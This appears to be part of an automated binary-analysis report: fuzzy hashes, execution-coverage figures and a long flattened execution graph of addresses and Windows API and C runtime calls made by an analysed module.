                                                      • Opcode Fuzzy Hash: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                      • Instruction Fuzzy Hash: 7A312B7160CB848FDBA8DF18E48579AB7E1FB98314F10465EE88CC7396DB309984CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:6.7%
                                                      Dynamic/Decrypted Code Coverage:2.5%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1873
                                                      Total number of Limit Nodes:40
7fef754f461 16802->16804 16803->16812 16825 7fef754b530 16803->16825 16806 7fef754afb0 _fflush_nolock 17 API calls 16804->16806 16807 7fef754f580 16805->16807 16806->16794 16807->16803 16809 7fef754afb0 _fflush_nolock 17 API calls 16807->16809 16810 7fef754f592 16809->16810 16811 7fef754afb0 _fflush_nolock 17 API calls 16810->16811 16811->16803 16812->16780 16812->16782 16815 7fef754afc1 16813->16815 16814 7fef754b04b 16814->16784 16814->16786 16815->16814 16816 7fef753bd70 _invalid_parameter 17 API calls 16815->16816 16816->16814 16818 7fef7550185 16817->16818 16819 7fef754afb0 _fflush_nolock 17 API calls 16818->16819 16820 7fef75501c7 16819->16820 16821 7fef75501dc 16820->16821 16823 7fef7550326 16820->16823 16828 7fef754ab10 16820->16828 16821->16780 16823->16821 16832 7fef7549290 16823->16832 16869 7fef754b090 16825->16869 16827 7fef754b56c 16827->16812 16829 7fef754ab23 16828->16829 16830 7fef754ab35 16828->16830 16829->16823 16830->16829 16831 7fef753bd70 _invalid_parameter 17 API calls 16830->16831 16831->16829 16833 7fef75492d8 16832->16833 16838 7fef75492b6 __doserrno 16832->16838 16834 7fef7549341 __doserrno 16833->16834 16840 7fef754938c 16833->16840 16837 7fef753bd70 _invalid_parameter 17 API calls 16834->16837 16835 7fef754945b 16846 7fef754fae0 16835->16846 16837->16838 16838->16821 16840->16835 16841 7fef7549410 __doserrno 16840->16841 16843 7fef753bd70 _invalid_parameter 17 API calls 16841->16843 16843->16838 16844 7fef75494a6 __doserrno 16860 7fef754fbc0 LeaveCriticalSection 16844->16860 16847 7fef754fb25 16846->16847 16848 7fef754fb7a 16846->16848 16851 7fef754fb56 16847->16851 16852 7fef754fb3b InitializeCriticalSectionAndSpinCount 16847->16852 16849 7fef7549464 16848->16849 16850 7fef754fb81 EnterCriticalSection 16848->16850 16849->16844 16854 7fef7549520 16849->16854 16850->16849 16861 7fef7539360 LeaveCriticalSection 16851->16861 16852->16851 16862 7fef754f900 16854->16862 16856 7fef7549545 16857 7fef754959d SetFilePointer 16856->16857 16859 
7fef7549552 _dosmaperr 16856->16859 16858 7fef75495c1 GetLastError 16857->16858 16857->16859 16858->16859 16859->16844 16860->16838 16861->16848 16863 7fef754f913 __doserrno 16862->16863 16864 7fef754f935 16862->16864 16863->16856 16865 7fef754f99e __doserrno 16864->16865 16866 7fef754f9e9 __doserrno 16864->16866 16867 7fef753bd70 _invalid_parameter 17 API calls 16865->16867 16866->16863 16868 7fef753bd70 _invalid_parameter 17 API calls 16866->16868 16867->16863 16868->16863 16870 7fef754b0b7 16869->16870 16871 7fef754b168 16870->16871 16873 7fef754b1a6 _CrtMemDumpAllObjectsSince 16870->16873 16878 7fef754b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 16870->16878 16872 7fef753bd70 _invalid_parameter 17 API calls 16871->16872 16872->16878 16874 7fef754b347 _CrtMemDumpAllObjectsSince 16873->16874 16879 7fef754b1cf 16873->16879 16875 7fef754b359 WideCharToMultiByte 16874->16875 16876 7fef754b3ab 16875->16876 16877 7fef754b3c1 GetLastError 16876->16877 16876->16878 16877->16878 16881 7fef754b3d0 _calloc_dbg_impl 16877->16881 16878->16827 16879->16878 16880 7fef753bd70 _invalid_parameter 17 API calls 16879->16880 16880->16878 16881->16878 16882 7fef753bd70 _invalid_parameter 17 API calls 16881->16882 16882->16878 18583 7fef75310b0 18584 7fef75310da 18583->18584 18585 7fef75310fc 18584->18585 18586 7fef7531000 4 API calls 18584->18586 18587 7fef7533280 __GSHandlerCheck 8 API calls 18585->18587 18586->18585 18588 7fef753112c 18587->18588 16883 7fef7549fba 16893 7fef7549c4d 16883->16893 16884 7fef754a06d WriteFile 16885 7fef754a103 GetLastError 16884->16885 16884->16893 16889 7fef7549dd9 _dosmaperr __doserrno 16885->16889 16886 7fef7533280 __GSHandlerCheck 8 API calls 16888 7fef754a9f5 16886->16888 16887 7fef7549f66 WideCharToMultiByte 16887->16889 16890 7fef7549fbf WriteFile 16887->16890 16889->16886 16892 7fef754a050 GetLastError 16890->16892 16890->16893 16891 7fef754fc00 WriteConsoleW CreateFileW _putwch_nolock 16891->16893 16892->16889 16892->16893 16893->16884 
16893->16887 16893->16889 16893->16891 16894 7fef754a158 GetLastError 16893->16894 16895 7fef754f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 16893->16895 16896 7fef754a1b5 GetLastError 16893->16896 16894->16889 16895->16893 16896->16889 16487 18001a10c 16488 18001a166 16487->16488 16491 180024f28 16488->16491 16490 18001a335 16492 180024fcb 16491->16492 16493 18002506a CreateProcessW 16492->16493 16493->16490 18589 7fef754bcbd 18590 7fef754b99c 18589->18590 18591 7fef754cc93 18590->18591 18594 7fef754bada 18590->18594 18592 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 18591->18592 18593 7fef753bd70 _invalid_parameter 17 API calls 18591->18593 18595 7fef7533280 __GSHandlerCheck 8 API calls 18592->18595 18593->18592 18597 7fef753bd70 _invalid_parameter 17 API calls 18594->18597 18596 7fef754cd90 18595->18596 18597->18592 18602 7fef7542c9f 18603 7fef7542caf 18602->18603 18604 7fef7542ca6 18602->18604 18604->18603 18605 7fef753bd70 _invalid_parameter 17 API calls 18604->18605 18605->18603 18606 7fef754809f 18607 7fef75480b0 _calloc_dbg_impl 18606->18607 18608 7fef7548145 _calloc_dbg_impl 18606->18608 18608->18607 18609 7fef753bd70 _invalid_parameter 17 API calls 18608->18609 18609->18607 16905 7fef754a7a0 16911 7fef754a61f 16905->16911 16906 7fef754a726 WideCharToMultiByte 16907 7fef754a791 GetLastError 16906->16907 16906->16911 16909 7fef754a887 _dosmaperr __doserrno 16907->16909 16908 7fef754a7b0 WriteFile 16908->16911 16912 7fef754a857 GetLastError 16908->16912 16910 7fef7533280 __GSHandlerCheck 8 API calls 16909->16910 16913 7fef754a9f5 16910->16913 16911->16906 16911->16908 16911->16909 16912->16911 16914 7fef7533faa 16915 7fef7533e30 LeaveCriticalSection 16914->16915 16916 7fef7533fb6 GetCurrentThreadId 16915->16916 16917 7fef7533fea SetLastError 16916->16917 18618 7fef7535cad 18619 7fef7535cb8 18618->18619 18622 7fef7535e1a _realloc_dbg 18619->18622 18623 7fef7539360 LeaveCriticalSection 18619->18623 18621 7fef7536201 18623->18621 16674 7fef753aca8 16675 
7fef753acb2 16674->16675 16676 7fef75374e0 __crtExitProcess 3 API calls 16675->16676 16677 7fef753acbc RtlAllocateHeap 16676->16677 18633 7fef7535854 18634 7fef753585b _calloc_dbg_impl 18633->18634 18635 7fef753c020 _free_base 2 API calls 18634->18635 18636 7fef75359d5 18635->18636 16949 7fef753cb4f 16954 7fef753cb5c 16949->16954 16950 7fef7533280 __GSHandlerCheck 8 API calls 16951 7fef753cf0f 16950->16951 16952 7fef753cbeb GetStdHandle 16953 7fef753cc94 16952->16953 16956 7fef753cc07 std::exception::_Copy_str 16952->16956 16953->16950 16954->16952 16954->16953 16955 7fef753cc99 16954->16955 16955->16953 16978 7fef7541640 16955->16978 16956->16953 16958 7fef753cc73 WriteFile 16956->16958 16958->16953 16959 7fef753cd10 16960 7fef7537ff0 _invoke_watson_if_error 16 API calls 16959->16960 16961 7fef753cd3d GetModuleFileNameW 16960->16961 16962 7fef753cd68 16961->16962 16966 7fef753cdb1 16961->16966 16963 7fef7541640 17 API calls 16962->16963 16964 7fef753cd84 16963->16964 16967 7fef7537ff0 _invoke_watson_if_error 16 API calls 16964->16967 16965 7fef753ce5e 16998 7fef7542d80 16965->16998 16966->16965 16988 7fef7543380 16966->16988 16967->16966 16969 7fef753ce76 16971 7fef7537ff0 _invoke_watson_if_error 16 API calls 16969->16971 16973 7fef753cea3 16971->16973 16972 7fef753ce31 16974 7fef7537ff0 _invoke_watson_if_error 16 API calls 16972->16974 16975 7fef7542d80 17 API calls 16973->16975 16974->16965 16976 7fef753ceb9 16975->16976 16977 7fef7537ff0 _invoke_watson_if_error 16 API calls 16976->16977 16977->16953 16979 7fef7541661 16978->16979 16980 7fef75416c2 16979->16980 16983 7fef7541700 _calloc_dbg_impl 16979->16983 16982 7fef753bd70 _invalid_parameter 17 API calls 16980->16982 16981 7fef7541832 _calloc_dbg_impl 16984 7fef75416f6 _calloc_dbg_impl 16981->16984 16987 7fef753bd70 _invalid_parameter 17 API calls 16981->16987 16982->16984 16983->16981 16985 7fef75417f4 16983->16985 16984->16959 16986 7fef753bd70 _invalid_parameter 17 API calls 16985->16986 16986->16984 
16987->16984 16990 7fef75433a6 16988->16990 16989 7fef754342f 16991 7fef753bd70 _invalid_parameter 17 API calls 16989->16991 16990->16989 16992 7fef754346d _calloc_dbg_impl 16990->16992 16994 7fef75433bc _calloc_dbg_impl 16990->16994 16991->16994 16993 7fef75435fb 16992->16993 16992->16994 16995 7fef7543639 _calloc_dbg_impl 16992->16995 16996 7fef753bd70 _invalid_parameter 17 API calls 16993->16996 16994->16972 16995->16994 16997 7fef753bd70 _invalid_parameter 17 API calls 16995->16997 16996->16994 16997->16994 16999 7fef7542da1 16998->16999 17000 7fef7542e02 16999->17000 17002 7fef7542e40 _calloc_dbg_impl 16999->17002 17001 7fef753bd70 _invalid_parameter 17 API calls 17000->17001 17005 7fef7542e36 _calloc_dbg_impl 17001->17005 17003 7fef7542f34 17002->17003 17004 7fef7542f72 _calloc_dbg_impl 17002->17004 17006 7fef753bd70 _invalid_parameter 17 API calls 17003->17006 17007 7fef75430b5 17004->17007 17009 7fef75430f3 _calloc_dbg_impl 17004->17009 17005->16969 17006->17005 17008 7fef753bd70 _invalid_parameter 17 API calls 17007->17008 17008->17005 17009->17005 17010 7fef753bd70 _invalid_parameter 17 API calls 17009->17010 17010->17005 18175 7fef7550550 18176 7fef7550575 18175->18176 18177 7fef755055e 18175->18177 18177->18176 18178 7fef7550568 CloseHandle 18177->18178 18178->18176 17645 7fef753425a FlsGetValue FlsSetValue 17646 7fef7534283 17645->17646 18179 7fef753e55a 18180 7fef753e564 18179->18180 18181 7fef753e601 18180->18181 18182 7fef753e5c2 RtlLookupFunctionEntry 18180->18182 18182->18181 18637 7fef753405b 18639 7fef753406e 18637->18639 18643 7fef7539360 LeaveCriticalSection 18639->18643 18641 7fef7534224 18642 7fef75341bb _updatetlocinfoEx_nolock 18644 7fef7539360 LeaveCriticalSection 18642->18644 18643->18642 18644->18641 18183 7fef754595c 18184 7fef753cf50 terminate 35 API calls 18183->18184 18185 7fef7545961 18184->18185 17022 7fef7535357 17025 7fef7539360 LeaveCriticalSection 17022->17025 17024 7fef7535361 17025->17024 18650 7fef753a057 18651 7fef753a061 
18650->18651 18652 7fef753a234 18651->18652 18653 7fef753a08e __initmbctable 18651->18653 18654 7fef753a25d IsValidCodePage 18652->18654 18658 7fef753a22d __initmbctable 18652->18658 18659 7fef753a5e0 __initmbctable 19 API calls 18653->18659 18656 7fef753a27b GetCPInfo 18654->18656 18654->18658 18655 7fef7533280 __GSHandlerCheck 8 API calls 18657 7fef753a470 18655->18657 18656->18658 18661 7fef753a295 __initmbctable 18656->18661 18658->18655 18659->18658 18660 7fef753a5e0 __initmbctable 19 API calls 18660->18658 18661->18660 17647 7fef7550e40 17648 7fef7550e50 17647->17648 17649 7fef7550e5e 17647->17649 17648->17649 17650 7fef7533e00 3 API calls 17648->17650 17650->17649 18662 7fef7551040 18665 7fef753e8f0 18662->18665 18664 7fef755108f 18666 7fef753e90d 18665->18666 18667 7fef7543cc0 __SehTransFilter 39 API calls 18666->18667 18668 7fef753e980 18667->18668 18668->18664 18190 7fef754f53e 18191 7fef754f55c 18190->18191 18192 7fef754f74d 18191->18192 18193 7fef7550170 23 API calls 18191->18193 18194 7fef7533280 __GSHandlerCheck 8 API calls 18192->18194 18193->18192 18195 7fef754f7c5 18194->18195 16551 7fef7537640 GetStartupInfoW 16560 7fef7537676 _calloc_dbg 16551->16560 16552 7fef7537689 16553 7fef7537ce0 SetHandleCount 16553->16552 16554 7fef7537b95 GetStdHandle 16556 7fef7537c7b 16554->16556 16557 7fef7537bb9 16554->16557 16555 7fef7537ab9 16555->16553 16555->16554 16555->16556 16556->16553 16557->16556 16558 7fef7537bc8 GetFileType 16557->16558 16558->16556 16559 7fef7537beb InitializeCriticalSectionAndSpinCount 16558->16559 16559->16552 16559->16556 16560->16552 16560->16555 16562 7fef7537a32 InitializeCriticalSectionAndSpinCount 16560->16562 16563 7fef7537a19 GetFileType 16560->16563 16562->16552 16562->16555 16563->16555 16563->16562 17651 7fef753ae40 17652 7fef753d490 std::exception::_Copy_str 17 API calls 17651->17652 17653 7fef753ae59 17652->17653 17654 7fef7537ff0 _invoke_watson_if_error 16 API calls 17653->17654 17655 7fef753ae86 std::exception::_Copy_str 
17654->17655 17659 7fef753af3a std::exception::_Copy_str 17655->17659 17674 7fef7540fd0 17655->17674 17657 7fef753af0d 17658 7fef7537ff0 _invoke_watson_if_error 16 API calls 17657->17658 17658->17659 17661 7fef753b2e0 17659->17661 17662 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17659->17662 17660 7fef753b33e 17684 7fef7540cc0 17660->17684 17661->17660 17663 7fef753d490 std::exception::_Copy_str 17 API calls 17661->17663 17662->17661 17665 7fef753b311 17663->17665 17667 7fef7537ff0 _invoke_watson_if_error 16 API calls 17665->17667 17667->17660 17668 7fef753b37d 17672 7fef7533280 __GSHandlerCheck 8 API calls 17668->17672 17669 7fef753cff0 terminate 34 API calls 17670 7fef753b373 17669->17670 17671 7fef7537090 _exit 33 API calls 17670->17671 17671->17668 17673 7fef753b3a0 17672->17673 17675 7fef7540ff7 17674->17675 17677 7fef7540ff0 __SehTransFilter 17674->17677 17676 7fef7541055 17675->17676 17679 7fef7541093 _calloc_dbg_impl 17675->17679 17678 7fef753bd70 _invalid_parameter 17 API calls 17676->17678 17677->17657 17678->17677 17679->17677 17680 7fef754111a 17679->17680 17682 7fef7541158 17679->17682 17681 7fef753bd70 _invalid_parameter 17 API calls 17680->17681 17681->17677 17682->17677 17683 7fef753bd70 _invalid_parameter 17 API calls 17682->17683 17683->17677 17702 7fef7533d00 RtlEncodePointer 17684->17702 17686 7fef7540cf6 17687 7fef7540d23 LoadLibraryW 17686->17687 17689 7fef7540e15 17686->17689 17688 7fef7540d44 GetProcAddress 17687->17688 17690 7fef7540d3d 17687->17690 17688->17690 17691 7fef7540d6a 7 API calls 17688->17691 17692 7fef7540e39 DecodePointer DecodePointer 17689->17692 17698 7fef7540e68 17689->17698 17693 7fef7533280 __GSHandlerCheck 8 API calls 17690->17693 17691->17689 17695 7fef7540df3 GetProcAddress EncodePointer 17691->17695 17692->17698 17699 7fef753b358 17693->17699 17694 7fef7540f60 DecodePointer 17694->17690 17695->17689 17696 7fef7540eed DecodePointer 17697 7fef7540f0d 17696->17697 17697->17694 17700 7fef7540f2f DecodePointer 
17697->17700 17698->17696 17698->17697 17701 7fef7540ec8 17698->17701 17699->17668 17699->17669 17700->17694 17700->17701 17701->17694 17702->17686 17703 7fef7539240 17704 7fef753925f 17703->17704 17705 7fef753924d 17703->17705 17706 7fef7539281 InitializeCriticalSectionAndSpinCount 17704->17706 17707 7fef7539295 17704->17707 17706->17707 17709 7fef7539360 LeaveCriticalSection 17707->17709 17709->17705 18196 7fef7531140 18197 7fef753116a 18196->18197 18198 7fef753118c 18197->18198 18199 7fef753119a FileTimeToSystemTime 18197->18199 18201 7fef7533280 __GSHandlerCheck 8 API calls 18198->18201 18199->18198 18200 7fef75311ae 18199->18200 18204 7fef7531000 GetThreadLocale GetDateFormatA 18200->18204 18203 7fef75311d0 18201->18203 18205 7fef7531062 GetThreadLocale GetTimeFormatA 18204->18205 18206 7fef753105b 18204->18206 18205->18206 18206->18198 18669 7fef754dc41 18670 7fef754ee40 25 API calls 18669->18670 18671 7fef754da75 18670->18671 18672 7fef754eca1 18671->18672 18675 7fef754dbb5 18671->18675 18673 7fef753bd70 _invalid_parameter 17 API calls 18672->18673 18676 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 18672->18676 18673->18676 18674 7fef7533280 __GSHandlerCheck 8 API calls 18677 7fef754ed9e 18674->18677 18678 7fef753bd70 _invalid_parameter 17 API calls 18675->18678 18676->18674 18678->18676 18679 7fef7538040 18680 7fef753805b GetModuleFileNameA 18679->18680 18681 7fef7538056 18679->18681 18683 7fef7538083 18680->18683 18682 7fef753aa40 __initmbctable 24 API calls 18681->18682 18682->18680 18684 7fef753d04a 18685 7fef753d1d8 DecodePointer 18684->18685 18686 7fef753d1e8 18685->18686 18687 7fef753d1f0 18686->18687 18688 7fef7537090 _exit 33 API calls 18686->18688 18689 7fef753d209 18686->18689 18688->18689 18691 7fef753d289 18689->18691 18693 7fef7533d00 RtlEncodePointer 18689->18693 18691->18687 18694 7fef7539360 LeaveCriticalSection 18691->18694 18693->18691 18694->18687 17034 7fef7551370 17037 7fef754af60 17034->17037 17038 7fef754af74 17037->17038 17039 
7fef754af98 LeaveCriticalSection 17037->17039 17042 7fef7539360 LeaveCriticalSection 17038->17042 17041 7fef754af96 17039->17041 17042->17041 18207 7fef754e16f 18209 7fef754e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 18207->18209 18208 7fef754eadf 18211 7fef754ef10 25 API calls 18208->18211 18209->18208 18210 7fef754eec0 25 API calls 18209->18210 18212 7fef754da75 18209->18212 18210->18208 18213 7fef754eafd 18211->18213 18215 7fef754eca1 18212->18215 18221 7fef754dbb5 18212->18221 18214 7fef754eb33 18213->18214 18217 7fef754eec0 25 API calls 18213->18217 18216 7fef754ec29 18214->18216 18227 7fef754eb49 _CrtMemDumpAllObjectsSince 18214->18227 18219 7fef753bd70 _invalid_parameter 17 API calls 18215->18219 18226 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 18215->18226 18218 7fef754ef10 25 API calls 18216->18218 18217->18214 18228 7fef754ebda 18218->18228 18219->18226 18220 7fef7533280 __GSHandlerCheck 8 API calls 18223 7fef754ed9e 18220->18223 18224 7fef753bd70 _invalid_parameter 17 API calls 18221->18224 18222 7fef754eec0 25 API calls 18222->18212 18224->18226 18225 7fef754f000 wcsxfrm 2 API calls 18225->18227 18226->18220 18227->18225 18227->18228 18229 7fef754ee40 25 API calls 18227->18229 18228->18212 18228->18222 18229->18227 16260 7fef7538670 GetEnvironmentStringsW 16261 7fef7538690 16260->16261 16263 7fef7538697 WideCharToMultiByte 16260->16263 16264 7fef7538733 16263->16264 16265 7fef753875f FreeEnvironmentStringsW 16263->16265 16264->16265 16266 7fef753876e WideCharToMultiByte 16264->16266 16265->16261 16267 7fef75387c2 FreeEnvironmentStringsW 16266->16267 16268 7fef75387aa 16266->16268 16267->16261 16268->16267 16306 7fef7533471 16307 7fef753347a 16306->16307 16316 7fef75334bc 16306->16316 16308 7fef7533496 16307->16308 16318 7fef75370b0 16307->16318 16310 7fef7537d00 _ioterm DeleteCriticalSection 16308->16310 16311 7fef753349b 16310->16311 16312 7fef7533e00 3 API calls 16311->16312 16313 7fef75334a0 16312->16313 16321 7fef75388d0 HeapDestroy 
16313->16321 16315 7fef75334a5 16315->16316 16317 7fef7533e00 3 API calls 16315->16317 16317->16316 16322 7fef7537280 16318->16322 16321->16315 16323 7fef7537296 _exit 16322->16323 16324 7fef75372c7 RtlDecodePointer 16323->16324 16331 7fef7537368 _initterm 16323->16331 16343 7fef753744e 16323->16343 16326 7fef75372e5 DecodePointer 16324->16326 16324->16331 16325 7fef753745e 16328 7fef75370c3 16325->16328 16329 7fef7537520 _exit LeaveCriticalSection 16325->16329 16339 7fef7537314 16326->16339 16328->16308 16330 7fef7537479 16329->16330 16369 7fef75374e0 16330->16369 16331->16343 16346 7fef7536210 16331->16346 16335 7fef753736d DecodePointer 16345 7fef7533d00 RtlEncodePointer 16335->16345 16339->16331 16339->16335 16342 7fef7537391 DecodePointer DecodePointer 16339->16342 16344 7fef7533d00 RtlEncodePointer 16339->16344 16340 7fef7537449 16359 7fef7536f10 16340->16359 16342->16339 16343->16325 16366 7fef7537520 16343->16366 16344->16339 16345->16339 16347 7fef7536229 16346->16347 16348 7fef753628f 16347->16348 16350 7fef75362cb 16347->16350 16372 7fef753bd70 DecodePointer 16348->16372 16376 7fef7539360 LeaveCriticalSection 16350->16376 16351 7fef75362c3 16351->16343 16353 7fef7537100 16351->16353 16354 7fef7537112 16353->16354 16355 7fef75371e4 DecodePointer 16354->16355 16356 7fef75371fe 16355->16356 16401 7fef7533d00 RtlEncodePointer 16356->16401 16358 7fef7537219 16358->16340 16402 7fef75363e0 16359->16402 16361 7fef7536f8e 16363 7fef7533280 __GSHandlerCheck 8 API calls 16361->16363 16362 7fef7536f33 16362->16361 16410 7fef7536660 16362->16410 16365 7fef7536fa7 16363->16365 16365->16343 16478 7fef7539360 LeaveCriticalSection 16366->16478 16368 7fef753752e 16368->16325 16479 7fef7537490 GetModuleHandleW 16369->16479 16373 7fef753bdd0 16372->16373 16374 7fef753bdac 16372->16374 16377 7fef753be00 16373->16377 16374->16351 16376->16351 16380 7fef753be50 16377->16380 16381 7fef753be81 __GSHandlerCheck 16380->16381 16382 7fef753be8d RtlCaptureContext 
RtlLookupFunctionEntry 16380->16382 16381->16382 16383 7fef753bf64 16382->16383 16384 7fef753bf1c RtlVirtualUnwind 16382->16384 16385 7fef753bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16383->16385 16384->16385 16386 7fef753bfde __GSHandlerCheck 16385->16386 16389 7fef7533280 16386->16389 16388 7fef753be2d GetCurrentProcess TerminateProcess 16388->16374 16391 7fef7533289 16389->16391 16390 7fef7533294 16390->16388 16391->16390 16392 7fef7533720 RtlCaptureContext RtlLookupFunctionEntry 16391->16392 16393 7fef7533764 RtlVirtualUnwind 16392->16393 16394 7fef75337a5 16392->16394 16395 7fef75337c7 IsDebuggerPresent 16393->16395 16394->16395 16400 7fef7538d90 16395->16400 16397 7fef7533826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16398 7fef7533844 __GSHandlerCheck 16397->16398 16399 7fef753384e GetCurrentProcess TerminateProcess 16397->16399 16398->16399 16399->16388 16400->16397 16401->16358 16403 7fef75363f1 16402->16403 16404 7fef7536447 16403->16404 16407 7fef7536480 16403->16407 16405 7fef753bd70 _invalid_parameter 17 API calls 16404->16405 16406 7fef753647b 16405->16406 16406->16362 16409 7fef7536504 16407->16409 16414 7fef7539360 LeaveCriticalSection 16407->16414 16409->16362 16411 7fef7536681 _CrtMemDumpAllObjectsSince 16410->16411 16415 7fef7536850 16411->16415 16413 7fef7536698 _LocaleUpdate::~_LocaleUpdate 16413->16361 16414->16406 16416 7fef7536871 16415->16416 16417 7fef7536ba6 16416->16417 16420 7fef75368ed _CrtIsValidPointer 16416->16420 16445 7fef7539360 LeaveCriticalSection 16417->16445 16419 7fef7536bb0 16419->16413 16421 7fef753695e IsBadReadPtr 16420->16421 16422 7fef7536976 16420->16422 16431 7fef753692f 16420->16431 16421->16422 16423 7fef7536ad2 16422->16423 16424 7fef7536a29 16422->16424 16427 7fef7536b2d 16423->16427 16428 7fef7536add 16423->16428 16425 7fef7536abe 16424->16425 16426 7fef7536a86 IsBadReadPtr 16424->16426 16433 7fef7536bf0 16425->16433 16426->16425 16426->16431 16427->16431 16432 
7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16427->16432 16429 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16428->16429 16429->16431 16431->16413 16432->16431 16434 7fef7536c28 16433->16434 16435 7fef7536e25 _LocaleUpdate::~_LocaleUpdate 16434->16435 16437 7fef7536c7a _CrtMemDumpAllObjectsSince 16434->16437 16436 7fef7533280 __GSHandlerCheck 8 API calls 16435->16436 16438 7fef7536e89 16436->16438 16440 7fef7536ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16437->16440 16446 7fef753c260 16437->16446 16438->16431 16450 7fef753c0c0 16440->16450 16442 7fef7536e12 16442->16431 16443 7fef7536dc7 16443->16442 16453 7fef7536ea0 16443->16453 16445->16419 16447 7fef753c286 _CrtMemDumpAllObjectsSince wcsxfrm 16446->16447 16449 7fef753c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16447->16449 16457 7fef753f4d0 16447->16457 16449->16440 16468 7fef7542260 16450->16468 16452 7fef753c103 16452->16443 16454 7fef7536ed1 16453->16454 16455 7fef7536ebd 16453->16455 16454->16442 16455->16454 16456 7fef753be00 _invalid_parameter 16 API calls 16455->16456 16456->16454 16458 7fef753f4f9 _CrtMemDumpAllObjectsSince 16457->16458 16461 7fef753f570 16458->16461 16460 7fef753f550 _LocaleUpdate::~_LocaleUpdate 16460->16449 16462 7fef753f599 MultiByteToWideChar 16461->16462 16465 7fef753f60b malloc _calloc_dbg_impl _MarkAllocaS 16462->16465 16466 7fef753f604 _CrtMemDumpAllObjectsSince_stat 16462->16466 16464 7fef753f68b MultiByteToWideChar 16464->16466 16467 7fef753f6ca GetStringTypeW 16464->16467 16465->16464 16465->16466 16466->16460 16467->16466 16469 7fef754228b 16468->16469 16470 7fef75422e1 16469->16470 16471 7fef754231f 16469->16471 16472 7fef753bd70 _invalid_parameter 17 API calls 16470->16472 16473 7fef7542385 16471->16473 16476 7fef75423c3 _calloc_dbg_impl 16471->16476 16475 7fef7542315 _calloc_dbg_impl 16472->16475 16474 7fef753bd70 _invalid_parameter 17 API calls 16473->16474 16474->16475 16475->16452 16476->16475 16477 
7fef753bd70 _invalid_parameter 17 API calls 16476->16477 16477->16475 16478->16368 16480 7fef75374b2 GetProcAddress 16479->16480 16481 7fef75374d1 ExitProcess 16479->16481 16480->16481 17043 7fef7541b64 17045 7fef7541b9d 17043->17045 17044 7fef754ab10 17 API calls 17046 7fef7541c86 17044->17046 17045->17044 17045->17046 17047 7fef7541bed 17045->17047 17046->17047 17048 7fef7549290 23 API calls 17046->17048 17048->17047 18234 7fef7551160 18237 7fef7544e90 18234->18237 18236 7fef7551179 18238 7fef7544ebb 18237->18238 18239 7fef7544ecf 18237->18239 18238->18239 18240 7fef753cf50 terminate 35 API calls 18238->18240 18239->18236 18240->18239 16654 7fef7538860 HeapCreate 16655 7fef7538891 GetVersion 16654->16655 16656 7fef753888d 16654->16656 16657 7fef75388c1 16655->16657 16658 7fef75388a7 HeapSetInformation 16655->16658 16657->16656 16658->16657 17710 7fef7545260 17711 7fef7545296 __SehTransFilter _CreateFrameInfo 17710->17711 17712 7fef753ed30 _FindAndUnlinkFrame 36 API calls 17711->17712 17713 7fef75453e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 17712->17713 17053 7fef754bb66 17054 7fef754bb78 _CrtMemDumpAllObjectsSince wcsxfrm 17053->17054 17055 7fef754bc46 17054->17055 17057 7fef754b99c 17054->17057 17056 7fef753bd70 _invalid_parameter 17 API calls 17055->17056 17062 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 17056->17062 17058 7fef754cc93 17057->17058 17060 7fef754bada 17057->17060 17059 7fef753bd70 _invalid_parameter 17 API calls 17058->17059 17058->17062 17059->17062 17064 7fef753bd70 _invalid_parameter 17 API calls 17060->17064 17061 7fef7533280 __GSHandlerCheck 8 API calls 17063 7fef754cd90 17061->17063 17062->17061 17064->17062 18245 7fef753ae14 18246 7fef753b390 18245->18246 18247 7fef7533280 __GSHandlerCheck 8 API calls 18246->18247 18248 7fef753b3a0 18247->18248 18249 7fef7540215 18250 7fef7540231 18249->18250 18260 7fef7540302 18249->18260 18320 7fef7548c80 18250->18320 18252 7fef7540489 18255 7fef7542d80 17 API calls 18252->18255 18254 7fef7537ff0 
16653->16649 18846 7fef75414e1 18847 7fef75414ef DecodePointer 18846->18847 18848 7fef7541520 DecodePointer 18846->18848 18847->18848 18850 7fef754150f 18847->18850 18849 7fef7541540 18848->18849 18851 7fef7533280 __GSHandlerCheck 8 API calls 18849->18851 18850->18848 18852 7fef754157a 18851->18852 16659 7fef75335e1 16660 7fef75335f1 16659->16660 16664 7fef75335ea 16659->16664 16660->16664 16665 7fef75312b0 16660->16665 16663 7fef75312b0 14 API calls 16663->16664 16666 7fef75312de CoLoadLibrary 16665->16666 16673 7fef7532f8c 16665->16673 16667 7fef7532f2e VirtualAlloc RtlAllocateHeap 16666->16667 16668 7fef7532f0f MessageBoxA ExitProcess 16666->16668 16671 7fef7532f73 _calloc_dbg_impl 16667->16671 16667->16673 16669 7fef7533280 __GSHandlerCheck 8 API calls 16670 7fef75330ff 16669->16670 16670->16663 16670->16664 16672 7fef7532f83 CoTaskMemFree 16671->16672 16672->16673 16673->16669 17536 7fef7533fe1 17537 7fef7533fea SetLastError 17536->17537 18447 7fef7545de0 18452 7fef7533170 18447->18452 18451 7fef7545e86 18453 7fef75331ac 18452->18453 18454 7fef7533280 __GSHandlerCheck 8 API calls 18453->18454 18455 7fef7533263 18454->18455 18455->18451 18456 7fef7533870 18455->18456 18457 7fef75339db __SehTransFilter 18456->18457 18458 7fef75338de __SehTransFilter 18456->18458 18457->18451 18458->18457 18459 7fef7533a71 RtlUnwindEx 18458->18459 18459->18457 18460 7fef754ade0 18465 7fef754fee0 18460->18465 18463 7fef754adf9 18466 7fef754ff00 _fflush_nolock 25 API calls 18465->18466 18467 7fef754ade9 18466->18467 18467->18463 18468 7fef754fc70 